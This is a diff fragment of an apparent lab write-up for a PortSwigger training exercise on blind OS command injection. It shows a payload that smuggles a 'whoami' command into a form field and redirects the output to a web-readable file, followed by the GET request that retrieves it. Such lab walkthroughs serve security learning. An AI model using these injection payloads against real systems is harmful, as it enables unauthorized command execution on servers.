Spadille1337/PortSwigger/Command Injection/(PRACTITIONER) Lab : Blind OS command injection with output redirection.md

 ```
 b||whoami>/var/www/images/whoami.txt||
 ```
-Next, intercept the request that contains an image and modify the filname in the request:
+Next, intercept the request that contains an image and change the filname to whoami.txt in the request:
 ```
 GET /image?filename=whoami.txt HTTP/1.1
 ```